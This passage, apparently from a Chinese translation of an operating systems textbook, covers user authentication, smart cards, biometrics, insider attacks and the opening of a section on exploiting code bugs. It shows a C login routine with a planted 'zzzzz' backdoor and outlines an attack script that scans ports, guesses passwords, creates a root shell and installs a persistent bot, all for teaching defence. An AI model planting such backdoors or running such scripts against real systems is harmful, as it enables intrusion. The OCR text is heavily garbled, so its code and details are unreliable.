另 一 种 口令 机 制 是 让 每 一 个 用 户 提供 一 长 串 问题 并 把 它们 安全 地 放 在 服务 器 中 (如 可 以 用 加 密 形 
式 )。 问 题 是 用 户 自选 的 并 且 不 用 写 在 纸 上 。 下 面 是 用 户 可 能 选择 的 问题 ; 

1) 谁 是 Marjolein 的 姐妹 ? 

2) 你 的 小 学 在 哪 一 条 路 上 ? 

3) Woroboff 女 士 教 什么 课 ? 

在 登录 时 ， 服 务 器 随机 提问 并 验证 答案 。 要 使 这 种 方法 有 效 ， 就 要 提供 尽 可 能 多 的 问题 和 答案 。 

另 一 种 方法 叫做 挑战 -响应 。 使 用 这 种 方法 时 ， 在 登录 为 用 户 时 用 户 选择 某 一 种 运算 ， 例 如 2。 当 
用 户 登录 时 ， 服 务 器 发 送 给 用 户 一 个 参数 ， 假 设 是 7， 在 这 种 情形 下 ， 用 户 就 输入 49。 这 种 运算 方法 可 
以 每 周 、 每 天 后 者 从 早 到 晚 经 常 变化 。 

如 果 用 户 的 终端 设备 具有 十 分 强大 的 运算 能 力 ， 如 个 人 计算 机 、 个 人 数字 助理 或 手机 ， 那 么 就 可 以 
使 用 更 强大 的 挑战 响应 方法 。 过 程 如 下 : 用 户 事 先 选择 密 钥 k， 并 手工 放置 到 服务 器 中 。 密 钥 的 备份 也 
被 安全 地 存放 在 用 户 的 计算 机 里 。 在 登录 时 ， 服 务 器 把 随机 产生 的 数 /发 送 到 用 户 端 ， 由 用 户 端 计算 出 
fr, OE. Wh, f 是 一 个 公开 已 知 的 函数 。 ， 服 务 器 也 做 同样 的 运算 看 看 结果 是 否 一 致 。 这 种 方 
法 的 优点 是 即使 窃听 者 看 到 并 记录 下 双方 通信 的 信息 ， 也 对 他 毫 无 用 处 。 当 然 ， 函数 /需要 足够 复杂 ， 
以 保证 4 不 能 被 逆 推 。 加 密 散 列 函 数 是 不 错 的 选择 ,7 与 8 的 异 或 值 (XOR) 作为 该 函数 的 一 个 参数 。 а 
今 为 止 ， 这 样 的 国 数 仍然 被 认为 是 难以 逆 推 的 。 
9.4.2 使 用 实际 物体 的 认证 方式 

用 户 认证 的 第 二 种 方式 验证 一 些 用 户 所 拥有 的 实际 物体 而 不 是 用 户 所 知道 的 信息 。 如 金属 钥匙 就 被 
使 用 了 好 几 个 世纪 。 现 在 ， 人 们 经 常 使 用 磁卡 ， 并 把 它 放 人 与 终端 或 计算 机 相连 的 读 卡 器 中 。 而 且 一 般 
情况 下 ， 用 户 不 仅 要 插 卡 ， 还 要 输入 口令 以 保护 别人 冒 用 遗失 或 偷 来 的 磁卡 。 银 行 的 ATM 机 (自动 取款 
机 ) 就 采用 这 种 方法 让 客户 使 用 磁卡 和 口令 码 (现在 大 多 数 国家 用 4 位 的 PIN 代码 ， 这 主要 是 为 了 减少 
ATM 机 安装 计算 机 键盘 的 费用 ) 通过 远程 终端 (ATM 机 ) 登录 到 银行 的 主机 上。 

载 有 信息 的 磁卡 有 两 种 ， 磁 条 卡 和 芯片 卡 。 磁 条 卡 后 面 粘 附 的 磁 条 上 可 以 写 入 存放 140 个 字 节 的 信 
息 。 这 些 信息 可 以 被 终端 读 出 并 发 送 到 主机 。 一 般 这 些 信息 包括 用 户口 令 (如 PIN 代码 ) 这 样 终端 即便 
在 与 银行 主机 通信 断 开 的 情况 下 也 可 以 校 验 。 通 常 ， 用 只 有 银行 已 知 的 密 钥 对 口令 进行 加 密 。 这 些 卡 片 
每 张 成 本 大 约 在 0.1 美 元 到 0.5 美 元 之 间 ， 价格 差异 主要 取决 于 卡片 前 面 的 全 息 图 像 和 生产 量 。 在 鉴别 用 
户 方面 ， 磁 条 卡 有 一 定 的 风险 。 因 为 读 写 卡 的 设备 比较 便宜 并 被 大 量 使 用 着 。 
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; 片 卡 在 卡片 上 包含 了 小 型 集成 电路 。 这 种 卡 又 可 以 被 进一步 分 为 两 类 ， 储 值 卡 和 智能 卡 。 储 值 证 
包含 了 一 定数 量 的 存 贮 单元 (通常 小 于 1KB)， 它 使 用 ROM 技 术 保 证 数据 在 断 电 和 离开 读 写 设备 后 也 能 够 
保持 记忆 。 不 卡片 上 没有 CPU， 所 以 被 存储 的 信息 只 有 外 部 的 CPU ( 读 卡 器 中 ) 才能 改变 。 储 值 卡 被 
大 量 生产 ， 使 得 每 张 成 本 可 以 低 于 1 美元 ， 如 电话 预付 费 卡 等 。 当 人 们 打 电 话 时 ， 卡 里 的 电话 费 被 扣除 ， 但 
没有 发 生 资金 的 转移 。 由 于 这 个 原因 ， 这 类 卡 仅仅 由 一 家 公司 发 售 并 只 能 用 于 一 种 读 卡 器 (如 电 
售 货 机 ) 。 当 然 也 可 以 存储 IKB 信 息 的 密码 并 通过 读 卡 机 发 送 到 主机 验证 ， 但 很 少 有 人 这 么 做 。 

近来 拥有 更 安全 特性 的 是 智能 卡 。 智 能 卡通 常 使 用 4MHz 8 位 CPU,16KB КОМ, 4 КВ ROM，512B 可 
擦 写 RAM 以 及 9600b/s 与 读 卡 器 之 间 的 通信 速率 。 这 类 卡 制作 越 来 越 小 巧 ， 但 各 种 参数 却 不 尽 相 同 。 这 
些 参数 包括 芯片 深度 〈 因 为 戏 和 人 在 卡片 里 )、 芯 片 宽度 ( 当 用 户 弯 折 卡 时 芯片 不 会 受 损 ) 和 成 本 (通常 
从 ! 美 元 到 20 美 元 一 张 不 等 ， 取 决 于 CPU 功率 、 存 储 大 小 以 及 是 否 有 密码 协 处 理 器 ) 。 

智能 卡 可 用 来 像 储 值 卡 一 样 储 值 ， 但 却 具 有 更 好 的 安全 性 和 更 广泛 的 用 途 。 用 户 可 以 在 ATM 机 上 或 
通过 银行 提供 的 特殊 读 卡 器 连接 到 主机 取 钱 。 用 户 在 商家 把 卡 插入 读 卡 器 后 ， 可 以 授权 卡片 进行 一 定数 
量 金额 的 转账 (输入 YES 后 )。 卡 片 将 一 段 加 密 过 的 信息 发 送 到 商家 ， 商 家 稍 后 将 信息 流转 到 银行 扣除 
所 付 金额 的 信用 。 

与 信用 卡 或 借 记 卡 相 比 , 智能 卡 的 最 大 优点 是 无 须 直接 与 银行 联机 操作 。 如 果 读 者 不 相信 这 个 优点 ， 
可 以 尝试 下 面 的 实验 。 在 商店 里 买 一 块 糖果 并 坚持 用 信用 卡 结账 。 如 果 商 家 反对 ， 你 就 说 身边 没有 现金 
而 且 你 希望 增加 飞行 里 数 S。 你 将 发 现 商 家 对 你 的 想法 毫 无 热情 (因为 使 用 信用 卡 的 相关 成 本 会 使 获得 
的 利润 相形 见 纳 )。 所 以 ， 在 商店 为 少量 商品 付款 、 付 电话 费 、 停 车 费 、 使 用 自动 售 货 机 以 及 其 他 许多 
需要 使 用 硬币 的 场合 下 ， 智 能 卡 是 十 分 有 用 的 。 在 欧洲 ， 智 能 卡 被 广泛 使 用 并 逐 浙 推广 到 其 他 地 区 。 

智能 卡 有 许多 其 他 的 潜在 用 途 (例如 ， 将 持 卡 人 的 过 敏 反应 以 及 其 他 医疗 状况 以 安全 的 方式 编码 ， 
供 紧 急 时 使 用 ) ， 但 本 书 并 不 是 讲 故事 的 ， 我 们 的 兴趣 在 于 智能 卡 如 何 用 于 安全 登录 认证 。 其 基本 概念 
很 简单 ; 智能 卡 非常 小 ， 卡 片上 有 可 携带 的 微型 计算 机 与 主机 进行 交谈 ( 称 作协 议 ) 并 验证 用 户 身份 。 
如 用 户 想 要 在 电子 商务 网 站 上 买 东西 时 ， 可 以 把 智能 卡 插入 家 里 与 PC 相连 的 读 电子 商务 网 站 不 仅 
可 以 比 用 口令 更 安全 地 通过 智能 卡 验证 用 户 身份 ， 还 可 以 在 卡 上 直接 扣除 购买 商品 的 金额 ， 减 少 了 网 站 
为 用 户 能 够 使 用 联机 信用 卡 进行 消费 而 付出 的 大 量 成 本 (以 及 风险 )。 

智能 卡 可 以 使 用 不 同 的 验证 机 制 。 一 个 简单 的 挑战 -响应 的 例子 是 这 样 的 ， 首 先 服务 器 向 智能 卡 发 
出 512 位 随机 数 ， 智 能 卡 接着 将 随机 数 加 上 存储 在 卡 上 EEPROM 中 的 512 位 用 户口 令 。 然 后 对 所 得 的 和 进 
行 平方 运算 ， 并 且 把 中 间 的 512 位 数字 发 送 回 服务 器 ， 这 样 服务 器 就 知道 了 用 户 的 口令 并 且 可 以 计算 出 
该 结果 值 正确 与 否 。 整 个 过 程 如 图 9-20 所 示 。 如 果 窃 听 者 看 到 了 双方 的 信息 ， 他 也 无 从 采用 ， 即 便 记录 
下 来 今后 也 没有 用 处 ， 因 为 下 一 次 登录 时 ， 服 务 器 会 发 出 男 一 个 512 位 的 随机 数 。 当 然 ， 我 们 可 以 使 用 
更 加 新 的 算法 而 不 是 简单 的 平方 运算 。 


而 
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智能 卡 读 卡 机 
图 9-20 使 用 智能 卡 的 认证 
任何 固定 的 密码 通信 协议 的 缺点 是 容易 在 传输 过 程 中 损坏 ， 从 而 使 智能 卡 丧 失 功 能 。 避 免 这 种 情况 
的 一 个 办 法 是 在 卡片 里 使 用 ROM 而 不 是 密码 通信 协议 ， 如 Java 解 释 程序 。 然 后 将 用 Java 二 进 制 语 言 写 成 


Ө 飞行 里 数 卡 是 信用 卡 的 一 种 ， 通 过 这 类 信用 卡 结账 时 ， 可 以 将 消费 的 金额 换算 成 航班 的 飞行 里 数 ， 消 费 到 
-定金 额 时 ， 可 能 兑换 免费 机 票 。 一 一 译 者 注 
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的 通信 协议 下 载 到 卡片 中 ， 并 解释 运行 。 通 过 这 种 方法 ， 即 使 协议 被 损坏 ， 也 能 够 在 全 球 范围 内 方便 地 
下 载 一 个 新 的 协议 ， 使 得 下 一 次 使 用 智能 卡 时 ， 该 协议 处 于 完好 的 状态 。 这 种 方法 的 缺点 是 让 j 
度 慢 的 智能 卡 更 慢 了 ， 但 是 随 着 技术 的 发 展 这 种 方法 将 被 广泛 使 用 。 智 能 卡 的 另 一 个 缺点 是 
的 卡片 可 以 让 不 法 分 子 实施 雳 道 攻 击 (side-channel attack)， 例 如 功率 分 析 攻 击 。 他 们 中 的 专家 通过 观 
察 智能 卡 在 执行 加 密 操作 时 的 电源 功率 损耗 ， 可 以 运用 适当 的 设备 推算 出 密 钥 。 也 可 以 让 智能 卡 对 特定 
的 密 钥 进行 加 密 操作 ， 从 加 密 的 时 间 来 推算 出 卡片 密 钥 的 有 关 信息 。 


9.4.3 使 用 生物 识别 的 验证 方式 
三 种 方法 是 对 用 户 的 某 些 物理 特征 进行 验证 ， 并 且 这 些 特征 很 难 伪造 。 这 种 方法 叫做 生物 识别 
人 ,2000) 。 如 接 通 在 电脑 上 的 指纹 或 声音 识别 器 可 以 对 用 户 身份 进行 校 验 。 

一 个 典型 的 生物 识别 系统 由 两 部 分 组 成 :注册 部 分 和 识别 部 分 。 在 注册 部 分 中 ， 用 户 的 特征 被 数字 
化 储存 ， 并 把 最 重要 的 识别 信息 抽取 后 存放 在 用 户 记录 中 。 存 放 方 式 可 以 是 中 心 数据 库 (如 用 于 远程 计 
算 机 登录 的 数据 库 ) 或 用 户 随身 携带 的 智能 卡 并 在 识别 时 插入 远程 读 卡 器 (如 ATM 机 )。 

另 一 个 部 分 是 识别 部 分 。 在 使 有 时， 首先 由 用 户 输入 登录 名 ， 然 后 系统 进行 识别 。 如 果 识 别 到 的 信 
息 与 注册 时 的 样本 信息 相同 ， 则 允许 登录 ， 否 则 就 拒绝 登录 。 这 时 仍然 需要 使 用 登录 名 ， 因为 仅仅 根据 
检测 到 的 识别 信息 来 判断 是 不 严格 的 ， 只 有 识别 部 分 的 信息 会 增加 对 识别 信息 的 排序 和 检索 难度 。 也 许 
某 两 个 人 会 具有 相同 的 生物 特征 ， 所 以 要 求生 物 特征 还 要 匹配 特定 用 户 身份 的 安全 性 比 只 要 求 匹配 一 般 
用 户 的 生物 特征 要 强 得 多 。 

被 选用 的 识别 特征 必须 有 足够 的 可 变性 ， 这 样 系统 可 以 准确 无 误 地 区 分 大 量 的 用 户 。 例 如 ， 头 发 颜 
色 就 不 是 一 个 好 的 特征 ， 因 为 许多 人 都 拥有 相同 颜色 的 头发 。 
而 且 ， 被 选用 的 特征 不 应 该 经 常 发 生变 化 (对 于 一 些 人 而 言 ， 一 弹簧 
头发 并 不 具有 这 个 特性 ) 。 例 如 ， 人 的 声音 由 于 感冒 会 变化 ， 而 压力 板 
人 的 脸 会 由 于 留 胡子 或 化 妆 而 与 注册 时 的 样本 不 同 。 既 然 样 本 
信息 永远 也 不 会 与 以 后 识别 到 的 信息 完全 符合 ， 那 么 系统 设计 
人 员 就 要 决定 识别 的 精度 有 多 大 。 在 极端 情况 下 ， 设 计 人 员 必 
须 考虑 系统 也 许 不 得 不 偶尔 拒绝 一 个 合法 用 户 ， 但 恰巧 让 一 个 
乔装 打扮 者 进入 系统 。 对 电子 商务 网 站 来 说 ， 拒 绝 一 名 合法 用 
户 比 遭受 一 小 部 分 诈骗 的 损失 要 严重 得 多 ， 而 对 核武 器 网 站 来 
说 ， 拒 绝 正式 员工 的 到 访 比 让 陌生 人 一 年 进入 几 回 要 好 得 多 。 

现在 让 我 们 来 看 一 看 实际 应 用 的 一 些 生 物 识别 方式 。 一 个 令 
人 有 些 惊奇 的 方式 是 使 用 手指 长 短 进 行 识 别 。 在 使 用 该 方法 时 ， 
每 一 个 终端 都 有 如 图 9-21 所 示 的 装置 。 用 户 把 手 插 进 装置 里 ， 系 图 9-21 一 种 测量 手指 长 度 的 装置 
统 就 会 对 手指 的 长 短 进行 测量 并 与 数据 库 里 的 样本 进行 核对 。 

然而 ， 手 指 长 度 识别 并 不 是 令 人 满意 的 方式 。 系统 可 能 遭受 手指 石膏 模型 或 其 他 仿制 品 的 攻击 ， 也 
许 人 侵 者 还 可 以 调节 手指 的 长 度 以 便 进行 实验 。 

另 一 种 目前 被 广泛 应 用 于 商业 的 生物 识别 模式 是 虹膜 识别 技术 。 任 何 两 个 人 都 具有 不 同 的 视网膜 组 
织 血管 (patterns) ， 即 使 是 同 卵 双 胞 胎 也 不 例外 ， 因 此 虹膜 识别 与 指纹 识别 同样 可 靠 ， 而 且 更 加 容易 实 
现 自 动 化 (Daugman, 2004), 用 户 的 视网膜 可 以 由 一 米 以 外 的 照相 机 拍照 并 通过 gabor 小 波 (gabor 
wavelet) 变换 的 方式 提取 某 些 特征 信息 ， 并 且 将 结果 压缩 为 256 字 节 。 该 结果 在 用 户 登 录 的 时 候 与 现场 
采样 结果 进行 比较 ， 如 果 两 者 的 汉 明 距离 (hamming distance) 小 于 某 个 阅 值 ， 则 该 用 户 通过 验证 (两 
个 比特 字 串 之 间 的 汉 明 距离 指 从 一 个 比特 串 变换 为 另 一 个 比特 串 最 少 需要 变化 的 比特 数 ) 。 

任何 依靠 图 像 进行 识别 的 技术 都 有 可 能 被 假冒 。 例 如 ， 某 和 可 以 戴 上 墨镜 靠近 ATM 机 前 的 照相 机 ， 
墨镜 上 贴 着 别人 的 视网膜 。 毕 况 ， 如 果 ATM 机 的 照相 机 可 以 在 1 米 距离 拍摄 视网膜 照片 ， 那 么 其 他 人 也 
可 以 这 么 做 ， 其 至 长 距离 地 使 用 镜头 。 出 于 这 个 原因 ， 还 必须 采取 一 些 额 外 的 对 策 ， 例如 在 照相 的 时 候 
使 用 闪光 灯 一 一 并 不 是 为 了 增加 光 的 强度 ， 而 是 为 了 观察 拍摄 到 的 瞳孔 是 否 会 在 强 光 下 收缩 ， 或 用 于 确 
定 所 拍摄 到 的 瞳孔 是 否 是 摄影 初学 者 的 拙 作 (此 时 红眼 效应 会 在 办 光 灯 下 出 现 ， 然而 当 关闭 闪光 灯 后 ， 
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则 看 不 到 红眼 )。 阿 姆 斯 特 丹 机 场 从 2001 年 起 就 开始 使 用 虹膜 识别 技术 以 便 使 得 经 常 出 入 机 场 的 常客 得 
以 跳 过 常规 安检 流程 。 

还 有 一 种 技术 叫做 签名 分 析 。 用 户 使 用 一 种 特殊 的 笔 签名 ， 笔 与 终端 相连 。 计 算 机 将 签名 与 在 线 存 
放 的 或 智能 卡 里 的 已 知 样本 进行 比较 。 更 好 的 一 种 办 法 是 不 去 比较 签名 ， 而 是 比较 笔 的 移动 轨迹 及 书写 
签名 时 产生 的 压力 。 一 个 好 的 伪造 者 也 许 能 够 复制 签名 ， 但 对 笔画 顺序 和 书写 的 压力 与 速度 却 毫 无 办 法 。 

还 有 一 种 依靠 迷你 装置 识别 的 技术 是 声音 测定 (Markowitz, 2000) 。 整 个 装置 只 需要 一 个 麦克 风 
(或 者 甚至 是 一 部 电话 ) 和 有 关 的 软件 即 可 。 声 音 测 定 技术 与 声音 识别 技术 不 同 。 后 者 是 为 了 识别 人 们 
说 了 些 什么 ， 而 前 者 是 为 了 判断 人 们 的 身份 。 有 些 系统 仅仅 要 求 用 户 说 一 句 密码 ， 但 是 窃听 者 可 以 把 这 
句 话 录 下 来 ， 通 过 回放 来 进入 系统 。 更 先进 的 系统 向 用 户 说 一 些 话 并 要 求 重 述 ， 用 户 每 次 登录 令 述 的 都 
是 不 同 的 语句 。 有 些 公司 开始 在 软件 中 使 用 声音 测定 技术 ， 如 通过 电话 线 连 接 使 用 的 家 庭 购物 软件 。 在 
这 种 情况 下 ， 声 音 测 定 比 用 PIN 密码 要 安全 得 多 。 

我 们 可 以 继续 给 出 许多 例子 ， 但 是 有 两 个 例子 特别 有 助 于 我 们 理解 。 猫 和 其 他 一 些 动物 通过 小 便 来 
划 定 自己 的 地 盘 。 很 明显 ， 猫 通过 这 种 方法 可 以 相互 识别 自己 的 家 。 假 设 某 和 人 拿 着 一 个 可 以 进行 尿 液 分 
析 的 装置 ， 那 么 他 就 可 以 建立 识别 样本 。 每 个 终端 都 可 以 有 这 样 的 装置 ， 装 置 前 放 着 一 条 标语 :“ 要 登 
录 系 统 ， 请 留 下 样本 。” 这 也 许 是 一 个 绝对 无 法 攻破 的 系统 ， 但 用 户 可 能 难以 接受 使 用 这 样 的 系统 。 

在 使 用 指纹 识别 装置 和 小 型 谱 仪 时 也 可 能 发 生 同样 的 情况 。 用 户 会 被 要 求 按 下 大 拇指 并 抽取 一 滴 血 
进行 化 验 分 析 。 问 题 在 于 任何 验证 识别 系统 对 用 户 来 说 应 该 从 心理 上 是 可 接受 的 。 手 指 长 度 识别 也 许 不 
会 引起 什么 麻烦 ， 但 是 类 似 于 在 线 存储 指纹 等 方式 虽然 减少 了 入侵 的 可 能 ， 但 对 大 多 数 人 来 说 是 不 可 接 
受 的 。 因 为 他 们 将 指纹 和 犯人 联系 在 一 起 。 


9.5 内 部 攻击 

前 几 节 对 于 用 户 认证 工作 原理 的 一 些 细节 问题 已 经 有 所 讨论 。 不 幸 的 是 ， 阻 止 不 速 之 客 登录 系统 仅 
仅 是 众多 安全 问题 中 的 一 个 。 另 一 个 完全 不 同 的 领域 可 以 被 定义 为 “内 部 攻击 ”(inside jobs)， 内 部 攻 
击 由 一 些 公司 的 编程 人 员 或 使 用 这 些 受 保护 的 计算 机 、 编 制 核心 软件 的 员工 实施 。 来 自 内 部 攻击 与 外 部 
攻击 的 区 别 在 于 ， 内 部 攻击 者 拥有 外 部 人 员 所 不 具备 的 专业 知识 和 访问 权限 。 下 面 我 们 将 给 出 一 些 内 部 
攻击 的 例子 ， 这 些 攻击 方式 曾经 非常 频繁 地 出 现在 公司 中 。 根 据 攻击 者 、 被 攻击 者 以 及 攻击 者 想 要 达到 
的 目的 这 三 方面 的 不 同 ， 每 种 攻击 都 具有 不 同 的 特点 。 


9.5.1 逻辑 炸弹 

在 软件 外 包 盛 行 的 时 代 ， 程 序 员 总 是 很 担心 他 们 会 失去 工作 ， 有 时 候 他 们 甚至 会 采取 某 些 措施 来 减轻 这 
种 担心 。 对 于 感受 到 失业 威胁 的 程序 员 ， 编 写 远 辑 炸弹 (оріс Боть) 就 成 为 了 一 种 策略 。 这 一 装置 是 某 些 公 
司 程序 员 (当前 被 雇用 的 ) 写 的 程序 代码 ， 并 被 秘密 地 放 和 人 产品 的 操作 系统 中 。 只 要 程序 员 每 天 输入 口令 
产品 就 相安 无 事 。 但 是 一 旦 程序 员 被 突然 解雇 并 毫 无 警告 地 被 要 求 离开 时 ， 第 二 天 (REA) 远 辑 炸弹 就 
会 因 得 不 到 口令 而 发 作 。 当 然 也 可 以 在 远 辑 炸弹 里 设置 多 个 变量 。 一 个 非常 有 名 的 例子 是 ， 逻 辑 炸弹 每 天 核 
对 薪水 册 。 如 果 某 程序 员 的 工 号 没有 在 连续 两 个 发 薪 日 中 出 现 ， 逐 辑 炸 弹 就 发 作 了 (Spafford 等 人 , 1989)。 

逻辑 炸弹 发 作 时 可 能 会 擦 去 磁盘 ， 随 机 删除 文件 ， 对 核心 程序 做 难以 发 现 的 改动 ， 或 者 对 原始 文件 
进行 加 密 。 在 后 面 的 例子 中 ， 公 司 对 是 否 要 叫 警察 带 走 放置 逻辑 炸弹 的 员工 进退 两 难 (报警 存在 着 导致 
数 月 后 对 该 员工 宣判 有 罪 的 可 能 ， 但 却 无 法 恢复 丢失 的 文件 )。 或 者 届 服 该 员工 对 公司 的 敲诈 ， 将 其 重 
新 雇用 为 “顾问 ”来 避免 如 同 天 文 数字 般 的 补救 ， 并 依 此 作为 解决 问题 的 交换 条 件 (公司 也 同时 期 望 他 
不 会 再 放置 新 的 逻辑 炸弹 )。 

在 很 多 有 记录 的 案例 中 ， 病 毒 向 被 其 感染 的 计算 机 中 植 人 逻辑 炸弹 。 一 般 情况 下 ， 这 些 逻辑 炸弹 被 
设计 为 在 未 来 的 某 个 时 间 “ 爆 炸 "。 然 而 ， 由 于 程序 员 无 法 预知 那 一 台 计算 机 将 会 被 攻击 ， 因 此 罗 辑 炸 
弹 无 法 用 于 保护 自己 不 失业 ， 也 无 法 用 户 勒 索 。 这 些 逻辑 炸弹 通常 会 被 设 定 为 在 政治 上 有 重要 意义 的 日 
子 爆炸 ， 因 此 它们 也 称 做 时 间 炸 弹 (time bomb), 


9.5.2 后 门 陷阱 
另 一 个 由 内 部 人 员 造 成 的 安全 漏洞 是 后 门 陷阱 (trap door) 。 这 一 问题 是 由 系统 程序 员 跳 过 一 些 通 


t 全 371 


常 的 检测 并 插入 一 段 代码 造成 的 。 如 程序 员 可 以 在 登录 程序 中 插入 一 小 段 代码 ， 让 所 有 使 用 ”zzzzz” 登 
录 名 的 用 户 成 功 登录 而 无 论 密 码 文件 中 的 密码 是 什么 。 正 常 的 程序 代码 如 图 9-22a 所 示 。 改 成 后 门 陷阱 
程序 的 代码 如 图 9-22b 所 示 。strcmp 这 行 代码 的 调用 是 为 了 判断 登录 名 是 否 为 ”zzzzz"。 如 果 是 ， 则 无 论 
输入 了 什么 密码 都 可 以 登录 。 如 果 后 门 陷阱 被 程序 员 放 入 到 计算 机 生产 商 的 产品 中 并 标 洋 过 海 ， 那 么 程 
序 员 日 后 就 可 以 任意 登录 到 这 家 公司 生产 的 计算 机 上 ， 而 无 论 谁 拥有 它 或 密码 是 什么 。 后 门 陷阱 程序 的 
实质 是 它 跳 过 了 正常 的 认证 过 程 。 


while (TRUE) { while (TRUE) { 
printt("login: "); Pprintf("login: *); 
get_string(name); get_string(name); 
disable_echoing( ); disable_echoing( ); 
printi("password: "); printf("password: 小 
get_string(password); get_string(password); 
enable_echoing( ); enable_echoing( ); 
v = check_validity(name, password); v = check_validity(name, password); 
й (у) break; if (v II ѕистр(пате, "zzzzz") == 0) break; 
} } 
execute_shell(name); execute_shell(name); 
а) b) 


图 9-22 а) 正常 的 代码 b) 插 人 了 后 门 陷阱 的 代码 


对 公司 来 说 ， 防 止 后 门 的 一 个 方法 是 把 代码 审查 (code review) 作为 标准 惯例 来 执行 。 通 过 这 一 技 
术 ， 一 旦 程序 员 完成 对 某 个 模块 的 编写 和 测试 后 ， 该 模块 被 放 入 代码 数据 库 中 进行 检验 。 开 发 小 组 里 的 
所 有 程序 员 周期 性 地 聚会 ， 每 个 人 在 小 组 面前 向 大 家 解释 每 行 代码 的 含义 。 这 样 做 不 仅 增加 了 找 出 后 门 
代码 的 机 会 ， 而 且 增 加 了 大 家 的 责任 感 ， 被 抓 出 来 的 程序 员 也 知道 这 样 做 会 损害 自己 的 职业 生涯 。 如 果 
该 建议 章 到 了 太 多 的 反对 ， 那 么 让 两 个 程序 员 相互 检查 代码 也 是 一 个 可 行 的 方法 。 
9.5.3 登录 欺骗 

这 种 内 部 攻击 的 实施 者 是 系统 的 合法 用 户 ， 然而 这 些 合法 用 户 却 试 图 通过 登录 欺骗 的 手段 获取 他 人 
的 密码 。 这 种 攻击 通常 发 生 在 一 个 具有 大 量 多 用 户 公用 计算 机 的 局 域 网 内 。 很 多 大 学 就 有 可 以 供 学 生 使 
用 的 机 房 ， 学 生 可 以 在 任意 一 台 计 算 机 上 进行 登录 。 登 录 雏 鸡 (login spoofing)。 它 是 这 样 工作 的 : Ж 
常 当 没有 人 登录 到 UNIX 终 端 或 局 域 网 上 的 工作 站 时 ， 会 显示 如 图 9-23a 所 示 的 屏幕 。 当 用 户 坐 下 来 输入 
登录 名 后 ， 系 统 会 要 求 输入 口令 。 如 果 口 令 正确 ， 用 户 就 可 以 登录 并 启动 shell (也 有 可 能 是 GUI) 程序 。 

现在 我 们 来 看 一 看 这 一 情节 。 一 个 恶意 的 用 户 Mal 写 了 一 个 程序 可 以 显示 如 图 9-23b 所 示 的 图 像 。 除 
了 内 部 没有 运行 登录 程序 外 ， 它 看 上 去 和 9-23a 惊 人 的 相似 ， 这 不 过 
是 骗 人 。 现 在 Mal 启 动 了 他 的 程序 ， 便 可 以 躲 在 远 处 看 好 戏 了 。 当 用 
户 坐 下 来 输入 登录 名 后 ， 程 序 要 求 输入 口令 并 屏蔽 了 响应 。 随 后 ， 
登录 名 和 口令 后 被 写 入 文件 并 发 出 信号 要 求 系统 结束 shell 程 序 。 这 
使 得 Mal 能 够 正常 退出 登录 并 触发 真正 的 登录 程序 ， 如 图 9-23a 所 示 。 
好 像 是 用 户 出 现 了 一 个 拼写 错误 并 要 求 再 次 登录 ， 这 时 真正 的 登录 图 9-23 а) 正确 的 登录 屏幕 ， 
程序 开始 工作 了 。 但 与 此 同时 Mal 又 得 到 了 另 一 对 组 合 (登录 名 和 口 b) 假冒 的 登录 屏幕 
令 )。 通 过 在 多 个 终端 上 进行 登录 欺骗 ， 入 侵 者 可 收集 到 多 个 口令 。 

防止 登录 欺骗 的 惟一 实用 的 办 法 是 将 登录 序列 与 用 户 程序 不 能 捕 所 的 键 组 合 起 来 。 Windows 为 此 目 
的 采用 了 Ctrl-Alt-Del。 如 果 用 户 毕 在 终端 前 开始 按 Ctrl-Alt-Del， 当前 用 户 就 会 被 注销 并 启动 新 的 登录 程 
序 。 没 有 任何 办 法 可 以 跳 过 这 一 步 。 
9.6 利用 代码 漏洞 

前 面 已 经 介绍 了 内 部 人 员 是 如 何 危害 系统 安全 的 ， 在 本 节 中 ， 我 们 将 介绍 外 部 人 员 (outsider) (E 
要 通过 互联 网 ) 对 操作 系统 进行 攻击 和 破坏 的 方式 。 几乎 所 有 的 攻击 机 制 都 利用 了 操作 系统 或 是 被 广泛 
使 用 的 软件 (如 IE 浏 览 器 和 微软 Office) 中 的 漏洞 。 一 种 典型 的 攻击 形成 方式 是 ， 有 人 发 现 了 操作 系统 
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中 的 一 个 漏洞 ， 接 着 发 现 如 何 利用 该 漏洞 攻击 计算 机 。 

每 一 种 攻击 都 涉及 特定 程序 中 的 特定 漏洞 , 其 中 利用 某 些 反复 出 现 的 漏洞 展开 的 攻击 值得 我 们 学 习 。 
在 本 节 中 ， 我 们 将 研究 一 些 攻击 的 工作 原理 ， 由 于 本 书 的 核心 是 操作 系统 ， 因 此 重点 将 放 在 如 何 攻击 操 
作 系统 上 ， 而 利用 系统 和 软件 漏洞 对 网 页 和 数据 库 的 攻击 方式 本 节 都 没有 涉及 。 

有 很 多 方式 可 以 对 漏洞 进行 利用 ， 在 一 种 直接 的 方法 中 ， 攻 击 者 会 启动 一 个 脚本 ， 该 脚本 按 顺 序 进 
行 如 下 活动 : 

1) 运行 自动 端口 扫描 ， 以 查找 接受 远程 连接 的 计算 机 。 

2) 尝试 通过 猜测 用 户 名 和 密码 进行 登录 。 

3) 一 旦 登录 成 功 ， 则 启动 特定 的 具有 漏洞 的 程序 ， 并 产生 输入 使 得 程序 中 的 漏洞 被 触发 。 

4) 如 果 访 程序 运行 SETUID 到 root， 则 创建 一 个 SETUID root shell, 

5) 启动 一 个 僵尸 程序 ， 监 听 IP 端 口 的 指令 。 

6) 对 目标 机 器 进行 配置 ， 确 保 该 僵尸 程序 在 系统 每 次 重新 启动 后 都 会 自动 运行 。 

上 述 脚本 可 能 会 运行 很 长 时 间 , 但 是 它 有 很 可 能 最 终 成 功 。 攻击 者 确保 只 要 目标 计算 机 重新 启动 时 ， 
僵尸 程序 也 启动 ， 就 使 得 这 台 计 算 机 一 直 被 控制 。 

另 一 种 常用 的 攻击 方式 利用 了 已 经 感染 病毒 的 计算 机 ， 在 该 计算 机 登录 到 其 他 机 器 的 时 候 ， 计 算 机 
中 的 病毒 启动 目标 机 器 中 的 漏洞 程序 (就 像 上 面 提 到 的 脚本 一 样 )。 基 本 上 只 有 第 一 步 和 第 二 步 与 上 述 
脚本 文件 不 同 ， 其 他 步骤 仍然 适用 。 不 论 哪 种 方法 ， 攻 击 者 的 程序 总 是 要 在 目标 机 器 中 运行 ， 而 该 机 器 
的 所 有 者 对 该 恶意 程序 一 无 所 知 。 


9.6.1 缓冲 区 溢出 攻击 

之 所 以 有 如 此 多 的 攻击 是 因为 操作 系统 和 其 他 应 用 程序 都 是 用 C 语 言 写 的 (因为 程序 员 喜 欢 它 ， 并 
